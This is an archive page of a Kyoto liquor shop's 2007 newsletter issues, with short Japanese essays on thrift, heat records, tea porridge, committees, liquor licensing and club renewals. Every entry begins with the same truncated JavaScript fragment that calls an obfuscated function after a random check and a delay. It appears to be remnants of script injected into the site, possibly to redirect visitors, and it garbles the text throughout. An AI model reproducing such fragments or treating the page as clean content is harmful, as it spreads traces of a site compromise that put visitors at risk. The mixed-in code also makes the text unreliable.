お酒のことなら集酉楽サカタニで!
とんからりん
  • HOME »
  • とんからりん »
  • 2007年

2007年

    2007年12月 Vol.99

    andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200712千二百円 惜しんだバカ

    10月17日、昔「べじべじ倶楽部」事業用につくった残高五千円の銀行預金解約に銀行へ出かけた。 もう忘れていた預金、久しぶりに祇園の有名そば店」で天ぷらそば(二千円)でも食べようと思っていた。 窓口で貰ったお金は五千七円。平成11年5月からの利息所得は七円、年一円の勘定だ。 年一円のお金を重く感じ「そば代」には使うのは「もったいない」と銀行に来る途中に見た「力餅」のもう一度食べたくなるチキンカレー丼・八百円の看板が浮かんだ。 天麩羅そばより千二百円安いとそれ決めた。 八百円で看板に偽りない味に満足して自転車で「店」戻るべく走った。 節約した成果金四千二百円と七年年月で増えた七円でポケットは重い。
    嬉しい気分(?)と下り坂に自然とスピードが上がる

    2007年11月 Vol.98

    andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200711「とんからりん」は字が小さく、行間せまいので読みつらいとご意見をいただきました。
    今月号から紙面を改良してみました。
    この「とんからりん」は平成7年5月創刊で12年余り続け、集酉楽サカタニ開店後は月刊紙にしました。
    編集、作成、印刷まで自家製。
    お届けも半数ほどは手配りの超ミニコミ紙です。
    友の会会員様のご意見や情報やご投稿をいただきながら「とんからりん」の名が似合う読物に育てたいと思っています。
    ご協力をお願い申し上げます。

    2007年10月 Vol.97

    andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200710暑い!と今年何回いいましたか?

    言うまいと思っていても、今年程この言葉が出た夏、いや秋も有りません。
    8月16日午後2時過ぎ岐阜県多治見市で40・9度になり昭和8年(1933)7月25日に山形県山形市で記録された40・8度を74年ぶりに更新しました。
    雨の降り方も「夕立」より南方のスコールのようにふり各地で浸水土砂崩れが頻発しました。
    日本だけでなく世界中で異常な気象現象が起こっています。

    2007年09月 Vol.96

    andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200709今月号から六月「ギャラリー集」で「京阪特急展}と「朝粥会」でもお話をしてくださった沖中忠順様のご協力で、「京阪七条交差点をめぐって」の連載が始りました。
    永年にわたって撮影された貴重な写真やお集めなった資料で、七条あたりの昔の光景がよみがえることでしょう。
    ご期待下さい。

    2007年08月 Vol.95

    andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200708昔より「京都の白粥、大和の茶粥」という食の歴史がありました。粘りのある白粥に対して、逆にさっぱりとしたのが大和の茶粥です。茶粥の歴史は、9世紀初頭、弘法大師が唐から茶種を持ち帰り大和地方に植えたのが「大和茶」。これから始まった、由緒有る茶粥です。
    さて、茶粥つくりは、前夜に米を洗いザルに入れ濡れフキンを掛けておく。朝、おくどさんで大鍋に湯を沸かす。フキンで作った袋に焙じ番茶を詰め込み湯に投じる。よく出たところで番茶袋を引き上げる。そこで前夜洗い上げた米を煮えたぎる中に投入、さっと蓋を被せる。噴きそうになったら蓋を取り(このタイミングが茶粥の生命線である)、おくどさんの薪を引く。
    シャバシャバのお粥さんの出来上がり。粘りが出たら駄目である。こんなものでは腹持ちが悪い。薩摩芋がある時は、蒸かしたものを暑さ15㍉ぐらいに輪切りにしてお粥の中に入れて食べる。

    2007年07月 Vol.94

    andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200707大流行! 第三者委員会

    近頃政府や市町村その他アチコチで「第3者委員会」をつくるのが大流行。当事者に能力が無いのか、当事者が信用できないと思われているか、当事者が火の粉を被る危険をさけるためなのか?理由はハッキリしないが何かが起こるとつくられる。 出来た時は気になるが、何時消えたか覚えてない青春時代のニキビに似たようなものらしい。 ニキビにあう薬は、名前を変えて次々出てくるが効果は無い場合が多い。結局は自らの体内からから治すの方が良いとかいう。
    「年金問題」でも、 払った被保険  者と受取った社 会保険庁(国家) が当事者なのに、事情を知らない第三者に判断を仰ぐとは。人生幸路でないが「責任者出て来い」と怒鳴りたい。

    2007年06月 Vol.93

    andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200706第十七話・拾う神もある

    会社を引き受け、10月1日現在地に移転新装開店を決め父と話し合い現在地に「新店」をつくる了解を得て家賃も決めました。何で息子に家賃をとるのかと思われる人も有るでしょうが、その辺父は非常にシビアな人です。
    私も家賃を払って、尚、利益を上げないと「天に悪い」と常に思っていたので不満はありません。保証金と開店までは無家賃にしてくれました。

    2007年06月 Vol.92 号外

    andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200706_2集酉楽サカタニはこんな店!

    私どもは、地域の方、京都に来られる方のお引き立てで、この町で、90余年酒屋を営んできました。有難うございます。幸い2階にスペースがあり、ファミマのお客様や観光客の方に気軽に使え場所、地域の方々にお楽しみ頂けるスペースをつくりました。
    料金もお安く、お気軽に使えます。

    2007年05月 Vol.91

    andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200705昨年から、あちこちのスーパー、コンビニがお酒を販売を始めました。逆に長らく営業していた酒屋さんがドンドン廃業されています。酒販売免許制度が見直されて誰でも?何所でも?「酒」が売れるようになった影響です。
    酒販売は緩和されましたが、酒税法と言う名の法律は厳としてあり、酒税法違反には高額な「罰金」も課せられます。交通違反のように「人体や物」に直接被害は与えないのですが、同じように「罰金や懲役」も有るのです。

    2007年04月 Vol.90

    andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200704サカタニ友の会三月末会員証更新です。

    「サカタニ友の会」の会員様の会員証は3月末でご更新を戴くことにしています。27日現在まだ「未更新会員様」が35%余有ります。是非、更新してくださるようお願いいたします。
    尚、更新には
    1200円の年会費が要ります。
    よろしくお願い申し上げます。

Page 1 / 212
PAGETOP
Copyright © SAKATANI | Produce'd by Passionaria